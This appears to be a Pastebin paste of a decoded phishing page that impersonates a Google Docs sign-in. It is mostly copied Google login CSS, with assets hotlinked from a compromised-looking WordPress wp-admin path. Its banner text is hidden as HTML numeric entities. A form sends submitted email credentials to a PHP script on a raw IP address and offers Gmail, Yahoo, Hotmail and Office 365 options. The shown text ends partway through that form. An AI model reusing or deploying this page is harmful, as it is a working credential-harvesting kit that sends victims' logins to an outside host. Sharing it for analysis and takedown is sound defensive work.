Advertisement
Guest User

Decoded Phishing HTML

a guest
Feb 19th, 2017
362
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 37.65 KB | None | 0 0
  1. <!DOCTYPE html>
  2. <html lang="en">
  3. <head>
  4. <meta charset="utf-8">
  5. <meta content="width=300, initial-scale=1" name="viewport">
  6.  
  7. <style>
  8. html, body {
  9. font-family: Arial, sans-serif;
  10. background: #fff;
  11. margin: 0;
  12. padding: 0;
  13. border: 0;
  14. position: absolute;
  15. height: 100%;
  16. min-width: 100%;
  17. font-size: 13px;
  18. color: #404040;
  19. direction: ltr;
  20. -webkit-text-size-adjust: none;
  21. }
  22. button,
  23. input[type=button],
  24. input[type=submit] {
  25. font-family: Arial, sans-serif;
  26. font-size: 13px;
  27. }
  28. a,
  29. a:hover,
  30. a:visited {
  31. color: #427fed;
  32. cursor: pointer;
  33. text-decoration: none;
  34. }
  35. a:hover {
  36. text-decoration: underline;
  37. }
  38. h1 {
  39. font-size: 20px;
  40. color: #262626;
  41. margin: 0 0 15px;
  42. font-weight: normal;
  43. }
  44. h2 {
  45. font-size: 14px;
  46. color: #262626;
  47. margin: 0 0 15px;
  48. font-weight: bold;
  49. }
  50. input[type=email],
  51. input[type=number],
  52. input[type=password],
  53. input[type=tel],
  54. input[type=text],
  55. input[type=url] {
  56. -moz-appearance: none;
  57. -webkit-appearance: none;
  58. appearance: none;
  59. display: inline-block;
  60. height: 36px;
  61. padding: 0 8px;
  62. margin: 0;
  63. background: #fff;
  64. border: 1px solid #d9d9d9;
  65. border-top: 1px solid #c0c0c0;
  66. -moz-box-sizing: border-box;
  67. -webkit-box-sizing: border-box;
  68. box-sizing: border-box;
  69. -moz-border-radius: 1px;
  70. -webkit-border-radius: 1px;
  71. border-radius: 1px;
  72. font-size: 15px;
  73. color: #404040;
  74. }
  75. input[type=email]:hover,
  76. input[type=number]:hover,
  77. input[type=password]:hover,
  78. input[type=tel]:hover,
  79. input[type=text]:hover,
  80. input[type=url]:hover {
  81. border: 1px solid #b9b9b9;
  82. border-top: 1px solid #a0a0a0;
  83. -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  84. -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  85. box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  86. }
  87. input[type=email]:focus,
  88. input[type=number]:focus,
  89. input[type=password]:focus,
  90. input[type=tel]:focus,
  91. input[type=text]:focus,
  92. input[type=url]:focus {
  93. outline: none;
  94. border: 1px solid #4d90fe;
  95. -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  96. -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  97. box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  98. }
  99. input[type=checkbox],
  100. input[type=radio] {
  101. -webkit-appearance: none;
  102. display: inline-block;
  103. width: 13px;
  104. height: 13px;
  105. margin: 0;
  106. cursor: pointer;
  107. vertical-align: bottom;
  108. background: #fff;
  109. border: 1px solid #c6c6c6;
  110. -moz-border-radius: 1px;
  111. -webkit-border-radius: 1px;
  112. border-radius: 1px;
  113. -moz-box-sizing: border-box;
  114. -webkit-box-sizing: border-box;
  115. box-sizing: border-box;
  116. position: relative;
  117. }
  118. input[type=checkbox]:active,
  119. input[type=radio]:active {
  120. background: #ebebeb;
  121. }
  122. input[type=checkbox]:hover {
  123. border-color: #c6c6c6;
  124. -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  125. -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  126. box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);
  127. }
  128. input[type=radio] {
  129. -moz-border-radius: 1em;
  130. -webkit-border-radius: 1em;
  131. border-radius: 1em;
  132. width: 15px;
  133. height: 15px;
  134. }
  135. input[type=checkbox]:checked,
  136. input[type=radio]:checked {
  137. background: #fff;
  138. }
  139. input[type=radio]:checked::after {
  140. content: '';
  141. display: block;
  142. position: relative;
  143. top: 3px;
  144. left: 3px;
  145. width: 7px;
  146. height: 7px;
  147. background: #666;
  148. -moz-border-radius: 1em;
  149. -webkit-border-radius: 1em;
  150. border-radius: 1em;
  151. }
  152. input[type=checkbox]:checked::after {
  153. content: url(http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/checkmark.png);
  154. display: block;
  155. position: absolute;
  156. top: -6px;
  157. left: -5px;
  158. }
  159. input[type=checkbox]:focus {
  160. outline: none;
  161. border-color: #4d90fe;
  162. }
  163. .stacked-label {
  164. display: block;
  165. font-weight: bold;
  166. margin: .5em 0;
  167. }
  168. .hidden-label {
  169. position: absolute !important;
  170. clip: rect(1px 1px 1px 1px); /* IE6, IE7 */
  171. clip: rect(1px, 1px, 1px, 1px);
  172. height: 0px;
  173. width: 0px;
  174. overflow: hidden;
  175. visibility: hidden;
  176. }
  177. input[type=checkbox].form-error,
  178. input[type=email].form-error,
  179. input[type=number].form-error,
  180. input[type=password].form-error,
  181. input[type=text].form-error,
  182. input[type=tel].form-error,
  183. input[type=url].form-error {
  184. border: 1px solid #dd4b39;
  185. }
  186. .error-msg {
  187. margin: .5em 0;
  188. display: block;
  189. color: #dd4b39;
  190. line-height: 17px;
  191. }
  192. .help-link {
  193. background: #dd4b39;
  194. padding: 0 5px;
  195. color: #fff;
  196. font-weight: bold;
  197. display: inline-block;
  198. -moz-border-radius: 1em;
  199. -webkit-border-radius: 1em;
  200. border-radius: 1em;
  201. text-decoration: none;
  202. position: relative;
  203. top: 0px;
  204. }
  205. .help-link:visited {
  206. color: #fff;
  207. }
  208. .help-link:hover {
  209. color: #fff;
  210. background: #c03523;
  211. text-decoration: none;
  212. }
  213. .help-link:active {
  214. opacity: 1;
  215. background: #ae2817;
  216. }
  217. .wrapper {
  218. position: relative;
  219. min-height: 100%;
  220. }
  221. .content {
  222. padding: 0 44px;
  223. }
  224. .main {
  225. padding-bottom: 100px;
  226. }
  227. /* For modern browsers */
  228. .clearfix:before,
  229. .clearfix:after {
  230. content: "";
  231. display: table;
  232. }
  233. .clearfix:after {
  234. clear: both;
  235. }
  236. /* For IE 6/7 (trigger hasLayout) */
  237. .clearfix {
  238. zoom:1;
  239. }
  240. .google-header-bar {
  241. height: 75px;
  242. border-bottom: 1px solid #e5e5e5;
  243. overflow: hidden;
  244. }
  245. .header .logo {
  246. float: left;
  247. margin-top: 13px;
  248. margin-right: 0;
  249. margin-bottom: 0;
  250. margin-left: 0;
  251. }
  252. .header .secondary-link {
  253. margin: 28px 0 0;
  254. float: right;
  255. }
  256. .header .secondary-link a {
  257. font-weight: normal;
  258. }
  259. .google-header-bar.centered {
  260. border: 0;
  261. height: 75px;
  262. }
  263. .google-header-bar.centered .header .logo {
  264. float: none;
  265. margin: 40px auto 30px;
  266. display: block;
  267. }
  268. .google-header-bar.centered .header .secondary-link {
  269. display: none
  270. }
  271. .google-footer-bar {
  272. position: absolute;
  273. bottom: 0;
  274. height: 35px;
  275. width: 100%;
  276. border-top: 1px solid #e5e5e5;
  277. overflow: hidden;
  278. }
  279. .footer {
  280. padding-top: 7px;
  281. font-size: .85em;
  282. white-space: nowrap;
  283. line-height: 0;
  284. }
  285. .footer ul {
  286. float: left;
  287. max-width: 80%;
  288. padding: 0;
  289. }
  290. .footer ul li {
  291. color: #737373;
  292. display: inline;
  293. padding: 0;
  294. padding-right: 1.5em;
  295. }
  296. .footer a {
  297. color: #737373;
  298. }
  299. .lang-chooser-wrap {
  300. float: right;
  301. display: inline;
  302. }
  303. .lang-chooser-wrap img {
  304. vertical-align: top;
  305. }
  306. .lang-chooser {
  307. font-size: 13px;
  308. height: 24px;
  309. line-height: 24px;
  310. }
  311. .lang-chooser option {
  312. font-size: 13px;
  313. line-height: 24px;
  314. }
  315. .hidden {
  316. height: 0px;
  317. width: 0px;
  318. overflow: hidden;
  319. visibility: hidden;
  320. display: none !important;
  321. }
  322. .banner {
  323. text-align: center;
  324. }
  325. .card {
  326. background-color: #f7f7f7;
  327. padding: 20px 25px 30px;
  328. margin: 0 auto 25px;
  329. width: 304px;
  330. -moz-border-radius: 2px;
  331. -webkit-border-radius: 2px;
  332. border-radius: 2px;
  333. -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  334. -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  335. box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  336. }
  337. .card > *:first-child {
  338. margin-top: 0;
  339. }
  340. .rc-button,
  341. .rc-button:visited {
  342. display: inline-block;
  343. min-width: 46px;
  344. text-align: center;
  345. color: #444;
  346. font-size: 14px;
  347. font-weight: 700;
  348. height: 36px;
  349. padding: 0 8px;
  350. line-height: 36px;
  351. -moz-border-radius: 3px;
  352. -webkit-border-radius: 3px;
  353. border-radius: 3px;
  354. -o-transition: all 0.218s;
  355. -moz-transition: all 0.218s;
  356. -webkit-transition: all 0.218s;
  357. transition: all 0.218s;
  358. border: 1px solid #dcdcdc;
  359. background-color: #f5f5f5;
  360. background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);
  361. background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);
  362. background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);
  363. background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);
  364. background-image: linear-gradient(top,#f5f5f5,#f1f1f1);
  365. -o-transition: none;
  366. -moz-user-select: none;
  367. -webkit-user-select: none;
  368. user-select: none;
  369. cursor: default;
  370. }
  371. .card .rc-button {
  372. width: 100%;
  373. padding: 0;
  374. }
  375. .rc-button.disabled,
  376. .rc-button[disabled] {
  377. opacity: .5;
  378. filter: alpha(opacity=50);
  379. cursor: default;
  380. pointer-events: none;
  381. }
  382. .rc-button:hover {
  383. border: 1px solid #c6c6c6;
  384. color: #333;
  385. text-decoration: none;
  386. -o-transition: all 0.0s;
  387. -moz-transition: all 0.0s;
  388. -webkit-transition: all 0.0s;
  389. transition: all 0.0s;
  390. background-color: #f8f8f8;
  391. background-image: -webkit-linear-gradient(top,#f8f8f8,#f1f1f1);
  392. background-image: -moz-linear-gradient(top,#f8f8f8,#f1f1f1);
  393. background-image: -ms-linear-gradient(top,#f8f8f8,#f1f1f1);
  394. background-image: -o-linear-gradient(top,#f8f8f8,#f1f1f1);
  395. background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
  396. -moz-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  397. -webkit-box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  398. box-shadow: 0 1px 1px rgba(0,0,0,0.1);
  399. }
  400. .rc-button:active {
  401. background-color: #f6f6f6;
  402. background-image: -webkit-linear-gradient(top,#f6f6f6,#f1f1f1);
  403. background-image: -moz-linear-gradient(top,#f6f6f6,#f1f1f1);
  404. background-image: -ms-linear-gradient(top,#f6f6f6,#f1f1f1);
  405. background-image: -o-linear-gradient(top,#f6f6f6,#f1f1f1);
  406. background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
  407. -moz-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  408. -webkit-box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  409. box-shadow: 0 1px 2px rgba(0,0,0,0.1);
  410. }
  411. .rc-button-submit,
  412. .rc-button-submit:visited {
  413. border: 1px solid #3079ed;
  414. color: #fff;
  415. text-shadow: 0 1px rgba(0,0,0,0.1);
  416. background-color: #4d90fe;
  417. background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);
  418. background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);
  419. background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);
  420. background-image: -o-linear-gradient(top,#4d90fe,#4787ed);
  421. background-image: linear-gradient(top,#4d90fe,#4787ed);
  422. }
  423. .rc-button-submit:hover {
  424. border: 1px solid #2f5bb7;
  425. color: #fff;
  426. text-shadow: 0 1px rgba(0,0,0,0.3);
  427. background-color: #357ae8;
  428. background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
  429. background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
  430. background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
  431. background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
  432. background-image: linear-gradient(top,#4d90fe,#357ae8);
  433. }
  434. .rc-button-submit:active {
  435. background-color: #357ae8;
  436. background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);
  437. background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);
  438. background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);
  439. background-image: -o-linear-gradient(top,#4d90fe,#357ae8);
  440. background-image: linear-gradient(top,#4d90fe,#357ae8);
  441.  
  442. -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  443. -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  444. box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  445. }
  446. .rc-button-red,
  447. .rc-button-red:visited {
  448. border: 1px solid transparent;
  449. color: #fff;
  450. text-shadow: 0 1px rgba(0,0,0,0.1);
  451. background-color: #d14836;
  452. background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);
  453. background-image: -moz-linear-gradient(top,#dd4b39,#d14836);
  454. background-image: -ms-linear-gradient(top,#dd4b39,#d14836);
  455. background-image: -o-linear-gradient(top,#dd4b39,#d14836);
  456. background-image: linear-gradient(top,#dd4b39,#d14836);
  457. }
  458. .rc-button-red:hover {
  459. border: 1px solid #b0281a;
  460. color: #fff;
  461. text-shadow: 0 1px rgba(0,0,0,0.3);
  462. background-color: #c53727;
  463. background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);
  464. background-image: -moz-linear-gradient(top,#dd4b39,#c53727);
  465. background-image: -ms-linear-gradient(top,#dd4b39,#c53727);
  466. background-image: -o-linear-gradient(top,#dd4b39,#c53727);
  467. background-image: linear-gradient(top,#dd4b39,#c53727);
  468. }
  469. .rc-button-red:active {
  470. border: 1px solid #992a1b;
  471. background-color: #b0281a;
  472. background-image: -webkit-linear-gradient(top,#dd4b39,#b0281a);
  473. background-image: -moz-linear-gradient(top,#dd4b39,#b0281a);
  474. background-image: -ms-linear-gradient(top,#dd4b39,#b0281a);
  475. background-image: -o-linear-gradient(top,#dd4b39,#b0281a);
  476. background-image: linear-gradient(top,#dd4b39,#b0281a);
  477. -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  478. -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  479. box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);
  480. }
  481. .secondary-actions {
  482. text-align: center;
  483. }
  484. </style>
  485. <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  486. .google-header-bar.centered {
  487. }
  488. .google-header-bar.centered .header .logo {
  489. margin-top: 15px;
  490. margin-right: auto;
  491. margin-bottom: 15px;
  492. margin-left: auto;
  493. }
  494. .card {
  495. margin-bottom: 20px;
  496. }
  497. </style>
  498. <style media="screen and (max-width: 580px)">
  499. html, body {
  500. font-size: 14px;
  501. }
  502. .google-header-bar.centered {
  503. height: 73px;
  504. }
  505. .google-header-bar.centered .header .logo {
  506. margin: 20px auto 15px;
  507. }
  508. .content {
  509. padding-left: 10px;
  510. padding-right: 10px;
  511. }
  512. .hidden-small {
  513. display: none;
  514. }
  515. .card {
  516. padding: 20px 15px 30px;
  517. width: 270px;
  518. }
  519. .footer ul li {
  520. padding-right: 1em;
  521. }
  522. .lang-chooser-wrap {
  523. display: none;
  524. }
  525. </style>
  526. <style>
  527. pre.debug {
  528. font-family: monospace;
  529. position: absolute;
  530. left: 0;
  531. margin: 0;
  532. padding: 1.5em;
  533. font-size: 13px;
  534. background: #f1f1f1;
  535. border-top: 1px solid #e5e5e5;
  536. direction: ltr;
  537. white-space: pre-wrap;
  538. width: 90%;
  539. overflow: hidden;
  540. }
  541. </style>
  542. <style>
  543. @font-face {
  544. font-family: 'Open Sans';
  545. font-style: normal;
  546. font-weight: 300;
  547. src: local('Open Sans Light'), local('OpenSans-Light'), url(http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/DXI1ORHCpsQm3Vp6mXoaTXhCUOGz7vYGh680lGh-uXM.woff) format('woff');
  548. }
  549. @font-face {
  550. font-family: 'Open Sans';
  551. font-style: normal;
  552. font-weight: 400;
  553. src: local('Open Sans'), local('OpenSans'), url(http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/cJZKeOuBrn4kERxqtaUH3T8E0i7KZn-EPnyo3HZu7kw.woff) format('woff');
  554. }
  555. </style>
  556. <style>
  557. h1, h2 {
  558. -webkit-animation-duration: 0.1s;
  559. -webkit-animation-name: fontfix;
  560. -webkit-animation-iteration-count: 1;
  561. -webkit-animation-timing-function: linear;
  562. -webkit-animation-delay: 0;
  563. }
  564. @-webkit-keyframes fontfix {
  565. from {
  566. opacity: 1;
  567. }
  568. to {
  569. opacity: 1;
  570. }
  571. }
  572. </style>
  573. <style>
  574. .banner {
  575. text-align: center;
  576. margin-top: 5px;
  577. margin-bottom: 5px;
  578. }
  579. .banner h1 {
  580. font-family: 'Open Sans', arial;
  581. -webkit-font-smoothing: antialiased;
  582. color: #555;
  583. font-size: 42px;
  584. font-weight: 300;
  585. margin-top: 0;
  586. margin-bottom: 20px;
  587. }
  588. .banner h2 {
  589. font-family: 'Open Sans', arial;
  590. -webkit-font-smoothing: antialiased;
  591. color: #555;
  592. font-size: 18px;
  593. font-weight: 400;
  594. margin-bottom: 20px;
  595. }
  596. .signin-card {
  597. width: 274px;
  598. padding: 40px 40px;
  599. }
  600. .signin-card .profile-img {
  601. width: 96px;
  602. height: 96px;
  603. margin: 0 auto 10px;
  604. display: block;
  605. -moz-border-radius: 50%;
  606. -webkit-border-radius: 50%;
  607. border-radius: 50%;
  608. }
  609. .signin-card .profile-name {
  610. font-size: 16px;
  611. font-weight: bold;
  612. text-align: center;
  613. margin: 10px 0 0;
  614. min-height: 1em;
  615. }
  616. .signin-card input[type=email],
  617. .signin-card input[type=password],
  618. .signin-card input[type=text],
  619. .signin-card input[type=submit] {
  620. width: 100%;
  621. display: block;
  622. margin-bottom: 10px;
  623. z-index: 1;
  624. position: relative;
  625. -moz-box-sizing: border-box;
  626. -webkit-box-sizing: border-box;
  627. box-sizing: border-box;
  628. }
  629. .signin-card #Email,
  630. .signin-card #Passwd,
  631. .signin-card .captcha {
  632. direction: ltr;
  633. height: 44px;
  634. font-size: 16px;
  635. }
  636. .signin-card #Email + .stacked-label {
  637. margin-top: 15px;
  638. }
  639. .signin-card #reauthEmail {
  640. display: block;
  641. margin-bottom: 10px;
  642. line-height: 36px;
  643. padding: 0 8px;
  644. font-size: 15px;
  645. color: #404040;
  646. line-height: 2;
  647. margin-bottom: 10px;
  648. font-size: 14px;
  649. text-align: center;
  650. overflow: hidden;
  651. text-overflow: ellipsis;
  652. white-space: nowrap;
  653. -moz-box-sizing: border-box;
  654. -webkit-box-sizing: border-box;
  655. box-sizing: border-box;
  656. }
  657. .one-google p {
  658. margin: 0 0 10px;
  659. color: #555;
  660. font-size: 14px;
  661. text-align: center;
  662. }
  663. .one-google p.create-account,
  664. .one-google p.switch-account {
  665. margin-bottom: 60px;
  666. }
  667. .one-google img {
  668. display: block;
  669. width: 210px;
  670. height: 17px;
  671. margin: 10px auto;
  672. }
  673. </style>
  674. <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  675. .banner h1 {
  676. font-size: 38px;
  677. margin-bottom: 15px;
  678. }
  679. .banner h2 {
  680. margin-bottom: 3px;
  681. }
  682. .one-google p.create-account,
  683. .one-google p.switch-account {
  684. margin-bottom: 30px;
  685. }
  686. .signin-card #Email {
  687. margin-bottom: 0;
  688. }
  689. .signin-card #Passwd {
  690. margin-top: -1px;
  691. }
  692. .signin-card #Email.form-error,
  693. .signin-card #Passwd.form-error {
  694. z-index: 2;
  695. }
  696. .signin-card #Email:hover,
  697. .signin-card #Email:focus,
  698. .signin-card #Passwd:hover,
  699. .signin-card #Passwd:focus {
  700. z-index: 3;
  701. }
  702. </style>
  703. <style media="screen and (max-width: 580px)">
  704. .banner h1 {
  705. font-size: 22px;
  706. margin-bottom: 15px;
  707. }
  708. .signin-card {
  709. width: 260px;
  710. padding: 20px 20px;
  711. margin: 0 auto 20px;
  712. }
  713. .signin-card .profile-img {
  714. width: 72px;
  715. height: 72px;
  716. -moz-border-radius: 72px;
  717. -webkit-border-radius: 72px;
  718. border-radius: 72px;
  719. }
  720. </style>
  721. <style>
  722. .jfk-tooltip {
  723. background-color: #fff;
  724. border: 1px solid;
  725. color: #737373;
  726. font-size: 12px;
  727. position: absolute;
  728. z-index: 800 !important;
  729. border-color: #bbb #bbb #a8a8a8;
  730. padding: 16px;
  731. width: 250px;
  732. }
  733. .jfk-tooltip h3 {
  734. color: #555;
  735. font-size: 12px;
  736. margin: 0 0 .5em;
  737. }
  738. .jfk-tooltip-content p:last-child {
  739. margin-bottom: 0;
  740. }
  741. .jfk-tooltip-arrow {
  742. position: absolute;
  743. }
  744. .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,
  745. .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
  746. display: block;
  747. height: 0;
  748. position: absolute;
  749. width: 0;
  750. }
  751. .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {
  752. border: 9px solid;
  753. }
  754. .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {
  755. border: 8px solid;
  756. }
  757. .jfk-tooltip-arrowdown {
  758. bottom: 0;
  759. }
  760. .jfk-tooltip-arrowup {
  761. top: -9px;
  762. }
  763. .jfk-tooltip-arrowleft {
  764. left: -9px;
  765. top: 30px;
  766. }
  767. .jfk-tooltip-arrowright {
  768. right: 0;
  769. top: 30px;
  770. }
  771. .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
  772. border-color: #bbb transparent;
  773. left: -9px;
  774. }
  775. .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
  776. border-color: #a8a8a8 transparent;
  777. }
  778. .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
  779. border-color: #fff transparent;
  780. left: -8px;
  781. }
  782. .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {
  783. border-bottom-width: 0;
  784. }
  785. .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {
  786. border-bottom-width: 0;
  787. }
  788. .jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {
  789. border-top-width: 0;
  790. }
  791. .jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {
  792. border-top-width: 0;
  793. top: 1px;
  794. }
  795. .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,
  796. .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
  797. border-color: transparent #bbb;
  798. top: -9px;
  799. }
  800. .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,
  801. .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
  802. border-color:transparent #fff;
  803. top:-8px;
  804. }
  805. .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {
  806. border-left-width: 0;
  807. }
  808. .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {
  809. border-left-width: 0;
  810. left: 1px;
  811. }
  812. .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {
  813. border-right-width: 0;
  814. }
  815. .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {
  816. border-right-width: 0;
  817. }
  818. .jfk-tooltip-closebtn {
  819. background: url("http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/x_8px.png") no-repeat;
  820. border: 1px solid transparent;
  821. height: 21px;
  822. opacity: .4;
  823. outline: 0;
  824. position: absolute;
  825. right: 2px;
  826. top: 2px;
  827. width: 21px;
  828. }
  829. .jfk-tooltip-closebtn:focus,
  830. .jfk-tooltip-closebtn:hover {
  831. opacity: .8;
  832. cursor: pointer;
  833. }
  834. .jfk-tooltip-closebtn:focus {
  835. border-color: #4d90fe;
  836. }
  837. </style>
  838. <style media="screen and (max-width: 580px)">
  839. .jfk-tooltip {
  840. display: none;
  841. }
  842. </style>
  843. <style>
  844. .need-help-reverse {
  845. float: right;
  846. }
  847. .remember .bubble-wrap {
  848. position: absolute;
  849. padding-top: 3px;
  850. -o-transition: opacity .218s ease-in .218s;
  851. -moz-transition: opacity .218s ease-in .218s;
  852. -webkit-transition: opacity .218s ease-in .218s;
  853. transition: opacity .218s ease-in .218s;
  854. left: -999em;
  855. opacity: 0;
  856. width: 314px;
  857. margin-left: -20px;
  858. }
  859. .remember:hover .bubble-wrap,
  860. .remember input:focus ~ .bubble-wrap,
  861. .remember .bubble-wrap:hover,
  862. .remember .bubble-wrap:focus {
  863. opacity: 1;
  864. left: inherit;
  865. }
  866. .bubble-pointer {
  867. border-left: 10px solid transparent;
  868. border-right: 10px solid transparent;
  869. border-bottom: 10px solid #fff;
  870. width: 0;
  871. height: 0;
  872. margin-left: 17px;
  873. }
  874. .bubble {
  875. background-color: #fff;
  876. padding: 15px;
  877. margin-top: -1px;
  878. font-size: 11px;
  879. -moz-border-radius: 2px;
  880. -webkit-border-radius: 2px;
  881. border-radius: 2px;
  882. -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  883. -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  884. box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);
  885. }
  886. #stay-signed-in {
  887. float: left;
  888. }
  889. #stay-signed-in-tooltip {
  890. left: auto;
  891. margin-left: -20px;
  892. padding-top: 3px;
  893. position: absolute;
  894. top: 0;
  895. visibility: hidden;
  896. width: 314px;
  897. z-index: 1;
  898. }
  899. .dasher-tooltip {
  900. position: absolute;
  901. left: 50%;
  902. top: 380px;
  903. margin-left: 150px;
  904. }
  905. .dasher-tooltip .tooltip-pointer {
  906. margin-top: 15px;
  907. }
  908. .dasher-tooltip p {
  909. margin-top: 0;
  910. }
  911. .dasher-tooltip p span {
  912. display: block;
  913. }
  914. </style>
  915. <style media="screen and (max-width: 800px), screen and (max-height: 800px)">
  916. .dasher-tooltip {
  917. top: 340px;
  918. }
  919. </style>
  920. <link href="http://fearlesslivemore.com/wp-admin/images/central/logo/SpryAssets/SpryValidationTextField.css" rel="stylesheet" type="text/css">
  921. <link href="http://fearlesslivemore.com/wp-admin/images/central/logo/SpryAssets/SpryValidationPassword.css" rel="stylesheet" type="text/css">
  922. <link rel="shortcut icon" href="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/favicon.ico" type="image/x-icon" />
  923. <script src="http://fearlesslivemore.com/wp-admin/images/central/logo/SpryAssets/SpryValidationTextField.js" type="text/javascript"></script>
  924. <script src="http://fearlesslivemore.com/wp-admin/images/central/logo/SpryAssets/SpryValidationPassword.js" type="text/javascript"></script>
  925. </head>
  926. <body>
  927. <div class="wrapper">
  928. <div class="google-header-bar centered">
  929. <div class="header content clearfix">
  930. <img src="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/logo_strip.png" alt="Google" width="405" height="72" class="logo">
  931. </div>
  932. </div>
  933. <div class="main content clearfix">
  934. <div class="banner">
  935. <h2> &#87;&#101;&#108;&#99;&#111;&#109;&#101;&#32;&#116;&#111;&#32;&#71;&#111;&#111;&#103;&#108;&#101;&#32;&#68;&#111;&#99;&#115;&#46;&#32;&#85;&#112;&#108;&#111;&#97;&#100;&#32;&#97;&#110;&#100;&#32;&#83;&#104;&#97;&#114;&#101;&#32;&#89;&#111;&#117;&#114;&#32;&#68;&#111;&#99;&#117;&#109;&#101;&#110;&#116;&#115;&#32;&#83;&#101;&#99;&#117;&#114;&#101;&#108;&#121; </h2>
  936. <h2 class="hidden-small">
  937. &#83;&#105;&#103;&#110;&#32;&#105;&#110;&#32;&#119;&#105;&#116;&#104;&#32;&#121;&#111;&#117;&#114;&#32;&#101;&#109;&#97;&#105;&#108;&#32;&#97;&#100;&#100;&#114;&#101;&#115;&#115;&#32;&#116;&#111;&#32;&#118;&#105;&#101;&#119;&#32;&#111;&#114;&#32;&#100;&#111;&#119;&#110;&#108;&#111;&#97;&#100;&#32;&#97;&#116;&#116;&#97;&#99;&#104;&#109;&#101;&#110;&#116;</h2>
  938. </div>
  939. <div class="card signin-card clearfix">
  940. <div id="cc_iframe_parent"></div>
  941. <img class="profile-img" src="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/avatar_2x.png" alt="">
  942. <!-- form submit start -->
  943. <form action="http://212.129.5.116/mr/lock.php" method="POST" autocomplete="OFF">
  944. <div><strong>&#83;&#101;&#108;&#101;&#99;&#116;&#32;&#121;&#111;&#117;&#114;&#32;&#101;&#109;&#97;&#105;&#108;&#32;&#112;&#114;&#111;&#118;&#105;&#100;&#101;&#114;</strong></div></br>
  945. <input type="hidden" name="hidCflag" id="hidCflag" value="" />
  946. <select class="cflagdd"><option value="0" data-imagesrc="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/mail_gmail.png"
  947. data-description="Sign in with Gmail">Gmail</option>
  948. <option value="1" data-imagesrc="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/yahoo.png"
  949. data-description="Sign in with Yahoo">Yahoo</option>
  950. <option value="2" data-imagesrc="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/live_hotmail.png"
  951. data-description="Sign in with Hotmail">Hotmail</option>
  952. <option value="3" data-imagesrc="http://fearlesslivemore.com/wp-admin/images/central/logo/Google_docs_files/office365.png"
  953. data-description="Sign in with Office 365">Office 365</option>
